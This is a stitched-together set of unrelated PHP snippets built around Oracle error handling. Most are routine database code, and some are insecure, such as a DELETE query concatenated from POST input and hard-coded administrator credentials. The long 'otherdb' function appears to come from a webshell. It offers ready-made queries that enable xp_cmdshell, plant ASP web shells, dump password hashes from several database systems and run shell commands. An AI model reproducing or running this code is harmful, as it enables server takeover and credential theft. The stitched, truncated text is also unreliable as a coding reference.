function getErrorCode()
{
if ($err = ocierror($this->_connection)) {
return $err['code'];
} else {
return false;
}
}
/**
* Get a description of the last error
* @return String
*/
public function lastError()
{
$arr = ocierror();
if (count($arr) > 1) {
return $arr["code"] . " - " . $arr["message"];
}
return "";
}
/**
* Connect to MySQL, but not to a database
*
* @param string $dbuser Username
* @param string $dbpassword Password
* @return bool Success
*
*/
public function connect($dbuser = '', $dbpassword = '', $dbname = '')
{
if (!($this->dbh = oci_new_connect($dbuser, $dbpassword, $dbname))) {
$err = ocierror();
$this->register_error($err['message'], $err['code']);
return false;
} else {
$this->clear_errors();
return true;
}
}
function add_image($name, $imagetype, $file)
{
if (!is_null($file)) {
if ($file["error"] != 0 || $file["size"] == 0) {
error("Incorrect Image");
} else {
if ($file["size"] < 1024 * 1024) {
global $DB;
$imageid = get_dbid("images", "imageid");
$image = fread(fopen($file["tmp_name"], "r"), filesize($file["tmp_name"]));
if ($DB['TYPE'] == "ORACLE") {
DBstart();
$lobimage = OCINewDescriptor($DB['DB'], OCI_D_LOB);
$stid = OCIParse($DB['DB'], "insert into images (imageid,name,imagetype,image)" . " values ({$imageid}," . zbx_dbstr($name) . "," . $imagetype . ",EMPTY_BLOB())" . " return image into :image");
if (!$stid) {
$e = ocierror($stid);
error("Parse SQL error [" . $e["message"] . "] in [" . $e["sqltext"] . "]");
return false;
}
OCIBindByName($stid, ':image', $lobimage, -1, OCI_B_BLOB);
if (!OCIExecute($stid, OCI_DEFAULT)) {
$e = ocierror($stid);
error("Execute SQL error [" . $e["message"] . "] in [" . $e["sqltext"] . "]");
return false;
}
$result = DBend($lobimage->save($image));
if (!$result) {
error("Couldn't save image!\n");
return false;
}
$lobimage->free();
OCIFreeStatement($stid);
return $stid;
} else {
if ($DB['TYPE'] == "POSTGRESQL") {
$image = pg_escape_bytea($image);
} else {
if ($DB['TYPE'] == "SQLITE3") {
$image = bin2hex($image);
}
}
}
return DBexecute("insert into images (imageid,name,imagetype,image)" . " values ({$imageid}," . zbx_dbstr($name) . "," . $imagetype . "," . zbx_dbstr($image) . ")");
} else {
error("Image size must be less than 1Mb");
}
}
} else {
error("Select image to download");
}
return false;
}
function query_exec($query)
{
# IMPORT MYSQL PARAMETERS (NOTE: IT WORKS WITH ABSOLUTE PATH ONLY !!)
include '../config/registry_oracle_db.php';
# open connection to db
//putenv("ORACLE_HOME=/usr/lib/oracle/xe/app/oracle/product/10.2.0");
$conn = OCILogOn($user_db, $password_db, $db) or die("Could not connect to Oracle database!") or die(ocierror());
# execute the EXEC query
$statement = ociparse($conn, $query);
$risultato = ociexecute($statement);
# close connection
ocilogoff($conn);
$a = 1;
return $a;
}
function ShowBusy()
{
global $_SERVER;
$errpage = "";
$err = ocierror();
$host = $_SERVER['HTTP_HOST'];
$page = $_SERVER['DOCUMENT_ROOT'] . "/error/index.php";
$msg = "Server is currently busy. Please retry again in a few seconds." . "<br><a href=http://{$host}>REFRESH</a>\n<br>" . $err['message'] . "</br>";
if (file_exists($page)) {
while (@ob_end_clean()) {
}
header("location: http://{$host}/error/index.php");
} else {
print $msg;
}
}
/**
* Open the connection
* @return One_Store_Connection_Oci
*/
public function open()
{
$meta = $this->getMeta();
//die($meta['db']['tns'] );
$link = oci_connect($meta['db']['user'], $meta['db']['password'], $meta['db']['tns']);
//print_r($link);
if (!$link) {
//print_r(ocierror());
throw new One_Exception('Not connected : ' . ocierror());
}
// Set the proper encoding if needed
/*
$encoding = $this->getEncoding();
if(null != $encoding)
{
mysql_query('SET NAMES "'.mysql_real_escape_string('.$encoding.').'"', $link);
}
*/
return $link;
}
/**
* Fetches all the rows for a select query. Returns FALSE if query failed and
* DB_OK for all other queries
*
* @deprecated
*
* @param resource $result
* @return array All rows in result set
*/
private function setResult($result)
{
$GLOBALS['log']->info('call to DBManager::setResult() is deprecated');
if (PEAR::isError($result) === true) {
$GLOBALS['log']->error($msg);
$result = FALSE;
} elseif ($result != DB_OK) {
// must be a result
$GLOBALS['log']->fatal("setResult:" . print_r($result, true));
$row = array();
$rows = array();
while (ocifetchinto($result, $row, OCI_ASSOC | OCI_RETURN_NULLS | OCI_RETURN_LOBS)) {
$err = ocierror($result);
if ($err == false) {
$rows[] = $row;
} else {
print_r($err);
}
}
$result = $rows;
}
$GLOBALS['log']->fatal("setResult: returning rows from setResult");
return $result;
}
/*
* To change this license header, choose License Headers in Project Properties.
* To change this template file, choose Tools | Templates
* and open the template in the editor.
*/
include './config/connect.php';
$delete_flag = TRUE;
if (!empty($_POST['items_to_delete'])) {
foreach ($_POST['items_to_delete'] as $key) {
$sql_delete = "DELETE FROM REPORT_DATA_DEMAND WHERE ID='" . $key . "'";
echo $sql_delete;
$sql_delete_parse = ociparse($connect, $sql_delete);
$delete_flag = ociexecute($sql_delete_parse);
if (!$delete_flag) {
ocierror($sql_delete_parse);
oci_rollback($connect);
break;
}
}
if ($delete_flag) {
if ($_GET['before_page'] == 'potensi') {
header("Location: delete.sitac.php?witel=" . $_GET['witel'] . "&tipe_site=" . $_GET['tipe_site'] . "&before_page=" . $_GET['before_page'] . "&status_delete=1");
} else {
if ($_GET['before_page'] == 'sitac' || $_GET['before_page'] == 'deployment') {
header("Location: delete.sitac.php?witel=" . $_GET['witel'] . "&tipe_site=" . $_GET['tipe_site'] . "&before_page=" . $_GET['before_page'] . "&jenis=" . $_GET['jenis'] . "&status_delete=1");
}
}
} else {
header("Location: delete.sitac.php?witel=" . $_GET['witel'] . "&tipe_site=" . $_GET['tipe_site'] . "&before_page=" . $_GET['before_page'] . "&status_delete=0");
}
<?php
//page should check if the object coming is null and redirect to index.php
$connection = oci_connect("ADMINISTRATOR", "ADMINISTRATOR", "(DESCRIPTION =\n\t\t\t\t\t\t\t\t\t\t\t\t\t (ADDRESS_LIST =\n\t\t\t\t\t\t\t\t\t\t\t\t\t (ADDRESS = (PROTOCOL = TCP)(HOST = 172.26.50.20)(PORT = 1521))\n\t\t\t\t\t\t\t\t\t\t\t\t\t )\n\t\t\t\t\t\t\t\t\t\t\t\t\t (CONNECT_DATA =\n\t\t\t\t\t\t\t\t\t\t\t\t\t (SID = MATCHDB)\n\t\t\t\t\t\t\t\t\t\t\t\t\t (SERVER = DEDICATED)\n\t\t\t\t\t\t\t\t\t\t\t\t\t )\n\t\t\t\t\t\t\t\t\t\t\t\t\t)");
//captures error
if (!$connection) {
echo "Invalid connection " . var_dump(ocierror());
die;
}
//gets values from index.php
$nickname = $_POST["user"];
$pass = $_POST["password"];
$query = 'INSERT INTO USERNAME (usernameID, usernamePassword) ' . 'VALUES (:nickname, :pass)';
$compiled = oci_parse($connection, $query);
oci_bind_by_name($compiled, ':nickname', $nickname);
oci_bind_by_name($compiled, ':pass', $pass);
oci_execute($compiled, OCI_NO_AUTO_COMMIT);
oci_commit($connection);
oci_close($connection);
echo "You have registered succesfully!";
function connectDB()
{
include './config/registry_oracle_db.php';
//putenv("ORACLE_HOME=/usr/lib/oracle/xe/app/oracle/product/10.2.0");
# open connection to db
$conn = oci_connect($user_db, $password_db, $db);
if (!$conn) {
$errorcode = array();
$error_message = array();
$errorcode[] = "XDSRegistryError";
$err = ocierror();
$error_message[] = $err['message'];
$database_error_response = makeSoapedFailureResponse($error_message, $errorcode);
writeTimeFile($_SESSION['idfile'] . "--Registry: database_error_response");
$file_input = $_SESSION['idfile'] . "-database_error_response.xml";
writeTmpFiles($database_error_response, $file_input, true);
SendResponseFile($_SESSION['tmp_path'] . $file_input);
//SendResponse($database_error_response);
exit;
}
return $conn;
}
function DBexecute($query, $skip_error_messages = 0)
{
global $DB;
//COpt::savesqlrequest($query);
$result = false;
if (isset($DB['DB']) && !empty($DB['DB'])) {
$DB['EXECUTE_COUNT']++;
// WRONG FOR ORACLE!!
//SDI('SQL Exec: '.$query);
switch ($DB['TYPE']) {
case 'MYSQL':
$result = mysql_query($query, $DB['DB']);
if (!$result) {
error('Error in query [' . $query . '] [' . mysql_error() . ']');
}
break;
case 'POSTGRESQL':
if (!($result = pg_query($DB['DB'], $query))) {
error('Error in query [' . $query . '] [' . pg_last_error() . ']');
}
break;
case 'ORACLE':
$stid = OCIParse($DB['DB'], $query);
if (!$stid) {
$e = @ocierror();
error('SQL error [' . $e['message'] . '] in [' . $e['sqltext'] . ']');
}
$result = @OCIExecute($stid, $DB['TRANSACTIONS'] ? OCI_DEFAULT : OCI_COMMIT_ON_SUCCESS);
if (!$result) {
$e = ocierror($stid);
error('SQL error [' . $e['message'] . '] in [' . $e['sqltext'] . ']');
} else {
$result = $stid;
}
break;
case 'SQLITE3':
if (!$DB['TRANSACTIONS']) {
lock_db_access();
}
$result = sqlite3_exec($DB['DB'], $query);
if (!$result) {
error('Error in query [' . $query . '] [' . sqlite3_error($DB['DB']) . ']');
}
if (!$DB['TRANSACTIONS']) {
unlock_db_access();
}
break;
}
if ($DB['TRANSACTIONS'] && !$result) {
$DB['TRANSACTION_STATE'] &= $result;
// SDI($query);
// SDI($DB['TRANSACTION_STATE']);
}
}
return $result;
}
/**
* Keeps track of the most recent Oracle error
*
*/
function _setError($source = null, $clear = false)
{
if ($source) {
$e = ocierror($source);
} else {
$e = ocierror();
}
$this->_error = $e['message'];
if ($clear) {
$this->_error = null;
}
}
function ErrorMsg()
{
$e = ocierror();
return is_array($e) ? $e['message'] : '';
}
function ErrorNo()
{
if (is_resource($this->_stmt)) {
$arr = @ocierror($this->_stmt);
} else {
$arr = @ocierror($this->_connectionID);
if ($arr === false) {
$arr = @ocierror();
}
if ($arr == false) {
return '';
}
}
return $arr['code'];
}
function da_sql_error($link, $config)
{
return ocierror($link);
}
/**
* This function will connect to the database, execute a query and will return the result handle.
*
* @param $sql The SQL statement to execute.
*
* @returns Handle to the result of the query. In case of an error, this function triggers an error.
*
* @internal
*/
function &_connectAndExec($sql)
{
$sql = str_replace(' #_', ' ' . YDConfig::get('YD_DB_TABLEPREFIX', ''), $sql);
$this->_logSql($sql);
$this->connect();
$stmt = OCIParse($this->_conn, $sql);
if (!$stmt) {
$error = ocierror($stmt);
trigger_error($error['message'], YD_ERROR);
}
$result = @OCIExecute($stmt);
if ($result === false && $this->_failOnError === true) {
$error = ocierror($stmt);
if (!empty($error['sqltext'])) {
$error['message'] .= ' (SQL: ' . $error['sqltext'] . ')';
}
trigger_error($error['message'], YD_ERROR);
}
return $stmt;
}
function otherdb()
{
$db = isset($_GET['db']) ? $_GET['db'] : '';
print <<<END
<form method="POST" name="dbform" id="dbform" action="?s=w&db={$db}" enctype="multipart/form-data">
<div class="actall"><a href="?s=w">   psotgresql  </a>
<a href="?s=w&db=ms">   mssql  </a>
<a href="?s=w&db=ora">   oracle  </a>
<a href="?s=w&db=ifx">   informix  </a>
<a href="?s=w&db=fb">   firebird  </a>
<a href="?s=w&db=db2">  db2  </a></div></form>
END;
if ($db == "ms") {
$mshost = isset($_POST['mshost']) ? $_POST['mshost'] : 'localhost';
$msuser = isset($_POST['msuser']) ? $_POST['msuser'] : '******';
$mspass = isset($_POST['mspass']) ? $_POST['mspass'] : '******';
$msdbname = isset($_POST['msdbname']) ? $_POST['msdbname'] : 'master';
$msaction = isset($_POST['action']) ? $_POST['action'] : '';
$msquery = isset($_POST['mssql']) ? $_POST['mssql'] : '';
$msquery = stripslashes($msquery);
print <<<END
<form method="POST" name="msform" action="?s=w&db=ms">
<div class="actall">Host:<input type="text" name="mshost" value="{$mshost}" style="width:100px">
User:<input type="text" name="msuser" value="{$msuser}" style="width:100px">
Pass:<input type="text" name="mspass" value="{$mspass}" style="width:100px">
Dbname:<input type="text" name="msdbname" value="{$msdbname}" style="width:100px"><br><br>
<script language="javascript">
function msFull(i){
\tStr = new Array(11);
Str[0] = "";
\tStr[1] = "select @@version;";
Str[2] = "select name from sysdatabases;";
Str[3] = "select name from sysobject where type='U';";
Str[4] = "select name from syscolumns where id=Object_Id('table_name');";
Str[5] = "Use master dbcc addextendedproc ('sp_OACreate','odsole70.dll');";
\tStr[6] = "Use master dbcc addextendedproc ('xp_cmdshell','xplog70.dll');";
\tStr[7] = "EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;";
Str[8] = "exec sp_configure 'show advanced options', 1;RECONFIGURE;exec sp_configure 'Ole Automation Procedures',1;RECONFIGURE;";
Str[9] = "exec sp_configure 'show advanced options', 1;RECONFIGURE;exec sp_configure 'Ad Hoc Distributed Queries',1;RECONFIGURE;";
Str[10] = "Exec master.dbo.xp_cmdshell 'net user';";
Str[11] = "Declare @s int;exec sp_oacreate 'wscript.shell',@s out;Exec SP_OAMethod @s,'run',NULL,'cmd.exe /c echo ^<%execute(request(char(35)))%^> > c:\\\\1.asp';";
\tStr[12] = "sp_makewebtask @outputfile='d:\\\\web\\\\bin.asp',@charset=gb2312,@query='select ''<%execute(request(chr(35)))%>''' ";
msform.mssql.value = Str[i];
\treturn true;
}
</script>
<textarea name="mssql" style="width:600px;height:200px;">{$msquery}</textarea><br>
<select onchange="return msFull(options[selectedIndex].value)">
\t<option value="0" selected>command</option>
<option value="1">version</option>
<option value="2">databases</option>
<option value="3">tables</option>
<option value="4">columns</option>
<option value="5">add sp_oacreate</option>
\t<option value="6">add xp_cmdshell</option>
\t<option value="7">add xp_cmdshell(2005)</option>
<option value="8">add sp_oacreate(2005)</option>
<option value="9">open openrowset(2005)</option>
<option value="10">xp_cmdshell exec</option>
<option value="10">sp_oamethod exec</option>
<option value="11">sp_makewebtask</option>
</select>
<input type="hidden" name="action" value="msquery">
<input class="bt" type="submit" value="Query"></div></form>
END;
if ($msaction == 'msquery') {
$msconn = mssql_connect($mshost, $msuser, $mspass);
mssql_select_db($msdbname, $msconn) or die("connect error :" . mssql_get_last_message());
$msresult = mssql_query($msquery) or die(mssql_get_last_message());
echo '<font face="verdana">';
echo '<table border="1" cellpadding="1" cellspacing="2">';
echo "\n<tr>\n";
for ($i = 0; $i < mssql_num_fields($msresult); $i++) {
echo '<td bgcolor="#228B22"><b>' . mssql_field_name($msresult, $i);
echo "</b></td>\n";
}
echo "</tr>\n";
mssql_data_seek($result, 0);
while ($msrow = mssql_fetch_row($msresult)) {
echo "<tr>\n";
for ($i = 0; $i < mssql_num_fields($msresult); $i++) {
echo '<td bgcolor="#B8B8E8">';
echo "{$msrow[$i]}";
echo '</td>';
}
echo "</tr>\n";
}
echo "</table>\n";
echo "</font>";
mssql_free_result($msresult);
mssql_close();
}
} elseif ($db == "ora") {
$orahost = isset($_POST['orahost']) ? $_POST['orahost'] : 'localhost';
$oraport = isset($_POST['oraport']) ? $_POST['oraport'] : '1521';
$orauser = isset($_POST['orauser']) ? $_POST['orauser'] : '******';
$orapass = isset($_POST['orapass']) ? $_POST['orapass'] : '******';
$orasid = isset($_POST['orasid']) ? $_POST['orasid'] : 'ORCL';
$oraaction = isset($_POST['action']) ? $_POST['action'] : '';
$oraquery = isset($_POST['orasql']) ? $_POST['orasql'] : '';
$oraquery = stripslashes($oraquery);
print <<<END
<form method="POST" name="oraform" action="?s=w&db=ora">
<div class="actall">Host:<input type="text" name="orahost" value="{$orahost}" style="width:100px">
Port:<input type="text" name="oraport" value="{$oraport}" style="width:50px">
User:<input type="text" name="orauser" value="{$orauser}" style="width:80px">
Pass:<input type="text" name="orapass" value="{$orapass}" style="width:100px">
SID:<input type="text" name="orasid" value="{$orasid}" style="width:50px"><br><br>
<script language="javascript">
function oraFull(i){
\tStr = new Array(8);
Str[0] = "";
\tStr[1] = "select version();";
Str[2] = "show databases;";
Str[3] = "show tables from db_name;";
Str[4] = "show columns from table_name;";
Str[5] = "select user,password from mysql.user;";
\tStr[6] = "select load_file(0xxxxxxxxxxxxxxxxxxxxx);";
\tStr[7] = "select 0xxxxx from mysql.user into outfile 'c:\\\\inetpub\\\\wwwroot\\\\test.php'";
\toraform.orasql.value = Str[i];
\treturn true;
}
</script>
<textarea name="orasql" style="width:600px;height:200px;">{$oraquery}</textarea><br>
<select onchange="return oraFull(options[selectedIndex].value)">
\t<option value="0" selected>command</option>
<option value="1">version</option>
<option value="2">databases</option>
<option value="3">tables</option>
<option value="4">columns</option>
<option value="5">hashes</option>
\t<option value="6">load_file</option>
\t<option value="7">into outfile</option>
</select>
<input type="hidden" name="action" value="myquery">
<input class="bt" type="submit" value="Query"></div></form>
END;
if ($oraaction == 'oraquery') {
$oralink = OCILogon($orauser, $orapass, "(DEscriptION=(ADDRESS=(PROTOCOL =TCP)(HOST={$orahost})(PORT = {$oraport}))(CONNECT_DATA =(SID={$orasid})))") or die(ocierror());
$oraresult = ociparse($oralink, $oraquery) or die(ocierror());
$orarow = oci_fetch_row($oraresult);
echo '<font face="verdana">';
echo '<table border="1" cellpadding="1" cellspacing="2">';
echo "\n<tr>\n";
for ($i = 0; $i < oci_num_fields($oraresult); $i++) {
echo '<td bgcolor="#228B22"><b>' . oci_field_name($oraresult, $i);
echo "</b></td>\n";
}
echo "</tr>\n";
ociresult($oraresult, 0);
while ($orarow = ora_fetch_row($oraresult)) {
echo "<tr>\n";
for ($i = 0; $i < ora_num_fields($result); $i++) {
echo '<td bgcolor="#B8B8E8">';
echo "{$orarow[$i]}";
echo '</td>';
}
echo "</tr>\n";
}
echo "</table>\n";
echo "</font>";
oci_free_statement($oraresult);
ocilogoff();
}
} elseif ($db == "ifx") {
$ifxuser = isset($_POST['ifxuser']) ? $_POST['ifxuser'] : '******';
$ifxpass = isset($_POST['ifxpass']) ? $_POST['ifxpass'] : '******';
$ifxdbname = isset($_POST['ifxdbname']) ? $_POST['ifxdbname'] : 'ifxdb';
$ifxaction = isset($_POST['action']) ? $_POST['action'] : '';
$ifxquery = isset($_POST['ifxsql']) ? $_POST['ifxsql'] : '';
$ifxquery = stripslashes($ifxquery);
print <<<END
<form method="POST" name="ifxform" action="?s=w&db=ifx">
<div class="actall">Dbname:<input type="text" name="ifxhost" value="{$ifxdbname}" style="width:100px">
User:<input type="text" name="ifxuser" value="{$ifxuser}" style="width:100px">
Pass:<input type="text" name="ifxpass" value="{$ifxpass}" style="width:100px"><br><br>
<script language="javascript">
function ifxFull(i){
\tStr = new Array(11);
Str[0] = "";
\tStr[1] = "select dbservername from sysobjects;";
Str[2] = "select name from sysdatabases;";
Str[3] = "select tabname from systables;";
Str[4] = "select colname from syscolumns where tabid=n;";
Str[5] = "select username,usertype,password from sysusers;";
\tifxform.ifxsql.value = Str[i];
\treturn true;
}
</script>
<textarea name="ifxsql" style="width:600px;height:200px;">{$ifxquery}</textarea><br>
<select onchange="return ifxFull(options[selectedIndex].value)">
\t<option value="0" selected>command</option>
<option value="1">dbservername</option>
<option value="1">databases</option>
<option value="2">tables</option>
<option value="3">columns</option>
<option value="4">hashes</option>
</select>
<input type="hidden" name="action" value="ifxquery">
<input class="bt" type="submit" value="Query"></div></form>
END;
if ($ifxaction == 'ifxquery') {
$ifxlink = ifx_connect($ifcdbname, $ifxuser, $ifxpass) or die(ifx_errormsg());
$ifxresult = ifx_query($ifxquery, $ifxlink) or die(ifx_errormsg());
$ifxrow = ifx_fetch_row($ifxresult);
echo '<font face="verdana">';
echo '<table border="1" cellpadding="1" cellspacing="2">';
echo "\n<tr>\n";
for ($i = 0; $i < ifx_num_fields($ifxresult); $i++) {
echo '<td bgcolor="#228B22"><b>' . ifx_fieldproperties($ifxresult);
echo "</b></td>\n";
}
echo "</tr>\n";
mysql_data_seek($ifxresult, 0);
while ($ifxrow = ifx_fetch_row($ifxresult)) {
echo "<tr>\n";
for ($i = 0; $i < ifx_num_fields($ifxresult); $i++) {
echo '<td bgcolor="#B8B8E8">';
echo "{$ifxrow[$i]}";
echo '</td>';
}
echo "</tr>\n";
}
echo "</table>\n";
echo "</font>";
ifx_free_result($ifxresult);
ifx_close();
}
} elseif ($db == "db2") {
$db2host = isset($_POST['db2host']) ? $_POST['db2host'] : 'localhost';
$db2port = isset($_POST['db2port']) ? $_POST['db2port'] : '50000';
$db2user = isset($_POST['db2user']) ? $_POST['db2user'] : '******';
$db2pass = isset($_POST['db2pass']) ? $_POST['db2pass'] : '******';
$db2dbname = isset($_POST['db2dbname']) ? $_POST['db2dbname'] : 'mysql';
$db2action = isset($_POST['action']) ? $_POST['action'] : '';
$db2query = isset($_POST['db2sql']) ? $_POST['db2sql'] : '';
$db2query = stripslashes($db2query);
print <<<END
<form method="POST" name="db2form" action="?s=w&db=db2">
<div class="actall">Host:<input type="text" name="db2host" value="{$db2host}" style="width:100px">
Port:<input type="text" name="db2port" value="{$db2port}" style="width:60px">
User:<input type="text" name="db2user" value="{$db2user}" style="width:100px">
Pass:<input type="text" name="db2pass" value="{$db2pass}" style="width:100px">
Dbname:<input type="text" name="db2dbname" value="{$db2dbname}" style="width:100px"><br><br>
<script language="javascript">
function db2Full(i){
\tStr = new Array(4);
Str[0] = "";
\tStr[1] = "select schemaname from syscat.schemata;";
Str[2] = "select name from sysibm.systables;";
Str[3] = "select colname from syscat.columns where tabname='table_name';";
Str[4] = "db2 get db cfg for db_name;";
\tdb2form.db2sql.value = Str[i];
\treturn true;
}
</script>
<textarea name="db2sql" style="width:600px;height:200px;">{$db2query}</textarea><br>
<select onchange="return db2Full(options[selectedIndex].value)">
\t<option value="0" selected>command</option>
<option value="1">databases</option>
<option value="1">tables</option>
<option value="2">columns</option>
<option value="3">db config</option>
</select>
<input type="hidden" name="action" value="db2query">
<input class="bt" type="submit" value="Query"></div></form>
END;
if ($myaction == 'db2query') {
//$db2string = "DRIVER={IBM DB2 ODBC DRIVER};DATABASE=$db2dbname;"."HOSTNAME=$db2host;PORT=$db2port;PROTOCOL=TCPIP;UID=$db2user;PWD=$db2pass;";
$db2link = db2_connect($db2dbname, $db2user, $db2pass) or die(db2_conn_errormsg());
$db2result = db2_exec($db2link, $db2query) or die(db2_stmt_errormsg());
$db2row = db2_fetch_row($db2result);
echo '<font face="verdana">';
echo '<table border="1" cellpadding="1" cellspacing="2">';
echo "\n<tr>\n";
for ($i = 0; $i < db2_num_fields($db2result); $i++) {
echo '<td bgcolor="#228B22"><b>' . db2_field_name($db2result);
echo "</b></td>\n";
}
echo "</tr>\n";
while ($db2row = db2_fetch_row($db2result)) {
echo "<tr>\n";
for ($i = 0; $i < db2_num_fields($db2result); $i++) {
echo '<td bgcolor="#B8B8E8">';
echo "{$db2row[$i]}";
echo '</td>';
}
echo "</tr>\n";
}
echo "</table>\n";
echo "</font>";
db2_free_result($db2result);
db2_close();
}
} elseif ($db == "fb") {
$fbhost = isset($_POST['fbhost']) ? $_POST['fbhost'] : 'localhost';
$fbpath = isset($_POST['fbpath']) ? $_POST['fbpath'] : '';
$fbpath = str_replace("\\\\", "\\", $fbpath);
$fbuser = isset($_POST['fbuser']) ? $_POST['fbuser'] : '******';
$fbpass = isset($_POST['fbpass']) ? $_POST['fbpass'] : '******';
$fbaction = isset($_POST['action']) ? $_POST['action'] : '';
$fbquery = isset($_POST['fbsql']) ? $_POST['fbsql'] : '';
$fbquery = stripslashes($fbquery);
print <<<END
<form method="POST" name="fbform" action="?s=w&db=fb">
<div class="actall">Host:<input type="text" name="fbhost" value="{$fbhost}" style="width:100px">
Path:<input type="text" name="fbpath" value="{$fbpath}" style="width:100px">
User:<input type="text" name="fbuser" value="{$fbuser}" style="width:100px">
Pass:<input type="text" name="fbpass" value="{$fbpass}" style="width:100px"><br/>
<script language="javascript">
function fbFull(i){
\tStr = new Array(5);
Str[0] = "";
\tStr[1] = "select RDB\$RELATION_NAME from RDB\$RELATIONS;";
Str[2] = "select RDB\$FIELD_NAME from RDB\$RELATION_FIELDS where RDB\$RELATION_NAME='table_name';";
Str[3] = "input 'D:\\createtable.sql';";
Str[4] = "shell netstat -an;";
\tfbform.fbsql.value = Str[i];
\treturn true;
}
</script>
<textarea name="fbsql" style="width:600px;height:200px;">{$fbquery}</textarea><br>
<select onchange="return fbFull(options[selectedIndex].value)">
\t<option value="0" selected>command</option>
<option value="1">tables</option>
<option value="2">columns</option>
<option value="3">import sql</option>
<option value="4">shell</option>
</select>
<input type="hidden" name="action" value="fbquery">
<input class="bt" type="submit" value="Query"></div></form>
END;
if ($fbaction == 'fbquery') {
$fblink = ibase_connect($fbhost . ':' . $fbpath, $fbuser, $fbpass) or die(ibase_errmsg());
$fbresult = ibase_query($fblink, $fbquery) or die(ibase_errmsg());
echo '<font face="verdana">';
echo '<table border="1" cellpadding="1" cellspacing="2">';
echo "\n<tr>\n";
for ($i = 0; $i < ibase_num_fields($fbresult); $i++) {
echo '<td bgcolor="#228B22"><b>' . ibase_field_info($fbresult, $i);
echo "</b></td>\n";
}
echo "</tr>\n";
ibase_field_info($fbresult, 0);
while ($fbrow = ibase_fetch_row($fbresult)) {
echo "<tr>\n";
for ($i = 0; $i < ibase_num_fields($fbresult); $i++) {
echo '<td bgcolor="#B8B8E8">';
echo "{$fbrow[$i]}";
echo '</td>';
}
echo "</tr>\n";
}
echo "</table>\n";
echo "</font>";
ibase_free_result($fbresult);
ibase_close();
}
} else {
$pghost = isset($_POST['pghost']) ? $_POST['pghost'] : 'localhost';
$pguser = isset($_POST['pguser']) ? $_POST['pguser'] : '******';
$pgpass = isset($_POST['pgpass']) ? $_POST['pgpass'] : '';
$pgdbname = isset($_POST['pgdbname']) ? $_POST['pgdbname'] : 'postgres';
$pgaction = isset($_POST['action']) ? $_POST['action'] : '';
$pgquery = isset($_POST['pgsql']) ? $_POST['pgsql'] : '';
$pgquery = stripslashes($pgquery);
print <<<END
<form method="POST" name="pgform" action="?s=w">
<div class="actall">Host:<input type="text" name="pghost" value="{$pghost}" style="width:100px;">
User:<input type="text" name="pguser" vaule="{$pguser}" style="width:100px">
Pass:<input tyoe="text" name="pgpass" value="{$pgpass}" style="width:100px">
Dbname:<input type="text" name="pgdbname" value="{$pgdbname}" style="width:100px"><br><br>
<script language="javascript">
function pgFull(i){
\tStr = new Array(7);
\tStr[0] = "";
Str[1] = "select version();";
Str[2] = "select datname from pg_database;";
Str[3] = "select relname from pg_stat_user_tables limit 1 offset n;";
Str[4] = "select column_name from information_schema.columns where table_name='xxx' limit 1 offset n;";
Str[5] = "select usename,passwd from pg_shadow;";
\tStr[6] = "select pg_file_read('pg_hba.conf',1,pg_file_length('pg_hb.conf'));";
\tpgform.pgsql.value = Str[i];
\treturn true;
}
</script>
<textarea name="pgsql" style="width:600px;height:200px;">{$pgquery}</textarea><br>
<select onchange="return pgFull(options[selectedIndex].value)">
\t<option value="0" selected>command</option>
<option value="1">version</option>
<option value="2">databases</option>
<option value="3">tables</option>
<option value="4">columns</option>
<option value="5">hashes</option>
\t<option value="6">pg_hb.conf</option>
</select>
<input type="hidden" name="action" value="pgquery">
<input class="bt" type="submit" value="Query"></div></form>
END;
if ($pgaction == 'pgquery') {
$pgconn = pg_connect("host={$pghost} dbname={$pgdbname} user={$pguser} password={$pgpass} ") or die('Could not connect: ' . pg_last_error());
$pgresult = pg_query($pgquery) or die('Query failed: ' . pg_last_error());
$pgrow = pg_fetch_row($pgresult);
echo '<font face="verdana">';
echo '<table border="1" cellpadding="1" cellspacing="2">';
echo "\n<tr>\n";
for ($i = 0; $i < pg_num_fields($pgresult); $i++) {
echo '<td bgcolor="#228B22"><b>' . pg_field_name($pgresult, $i);
echo "</b></td>\n";
}
echo "</tr>\n";
pg_result_seek($pgresult, 0);
while ($pgrow = pg_fetch_row($pgresult)) {
echo "<tr>\n";
for ($i = 0; $i < pg_num_fields($pgresult); $i++) {
echo '<td bgcolor="#B8B8E8">';
echo "{$pgrow[$i]}";
echo '</td>';
}
echo "</tr>\n";
}
echo "</table>\n";
echo "</font>";
pg_free_result($pgresult);
pg_close();
}
}
}
function DBexecute($query, $skip_error_messages = 0)
{
global $DB;
if (!isset($DB['DB']) || empty($DB['DB'])) {
return false;
}
$result = false;
$time_start = microtime(true);
$DB['EXECUTE_COUNT']++;
switch ($DB['TYPE']) {
case ZBX_DB_MYSQL:
if (!($result = mysql_query($query, $DB['DB']))) {
error('Error in query [' . $query . '] [' . mysql_error() . ']');
}
break;
case ZBX_DB_POSTGRESQL:
if (!($result = (bool) pg_query($DB['DB'], $query))) {
error('Error in query [' . $query . '] [' . pg_last_error() . ']');
}
break;
case ZBX_DB_ORACLE:
if (!($result = OCIParse($DB['DB'], $query))) {
$e = @ocierror();
error('SQL error [' . $e['message'] . '] in [' . $e['sqltext'] . ']');
} elseif (!@OCIExecute($result, $DB['TRANSACTIONS'] ? OCI_DEFAULT : OCI_COMMIT_ON_SUCCESS)) {
$e = ocierror($result);
error('SQL error [' . $e['message'] . '] in [' . $e['sqltext'] . ']');
} else {
$result = true;
// function must return boolean
}
break;
case ZBX_DB_DB2:
if (!($result = db2_prepare($DB['DB'], $query))) {
$e = @db2_stmt_errormsg($result);
error('SQL error [' . $query . '] in [' . $e . ']');
} elseif (true !== @db2_execute($result)) {
$e = @db2_stmt_errormsg($result);
error('SQL error [' . $query . '] in [' . $e . ']');
} else {
$result = true;
// function must return boolean
}
break;
case ZBX_DB_SQLITE3:
if ($DB['TRANSACTIONS'] == 0) {
lock_sqlite3_access();
}
if (!($result = $DB['DB']->exec($query))) {
error('Error in query [' . $query . '] Error code [' . $DB['DB']->lastErrorCode() . '] Message [' . $DB['DB']->lastErrorMsg() . ']');
}
if ($DB['TRANSACTIONS'] == 0) {
unlock_sqlite3_access();
}
break;
}
if ($DB['TRANSACTIONS'] != 0 && !$result) {
$DB['TRANSACTION_NO_FAILED_SQLS'] = false;
}
CProfiler::getInstance()->profileSql(microtime(true) - $time_start, $query);
return (bool) $result;
}
function otherdb()
{
$db = isset($_GET['db']) ? $_GET['db'] : 'ms';
print <<<END
<form method="POST" name="dbform" id="dbform" action="?s=gg&db={$db}" enctype="multipart/form-data">
<div class="actall">
<a href="?s=gg&db=ms">   MSSQL  </a>
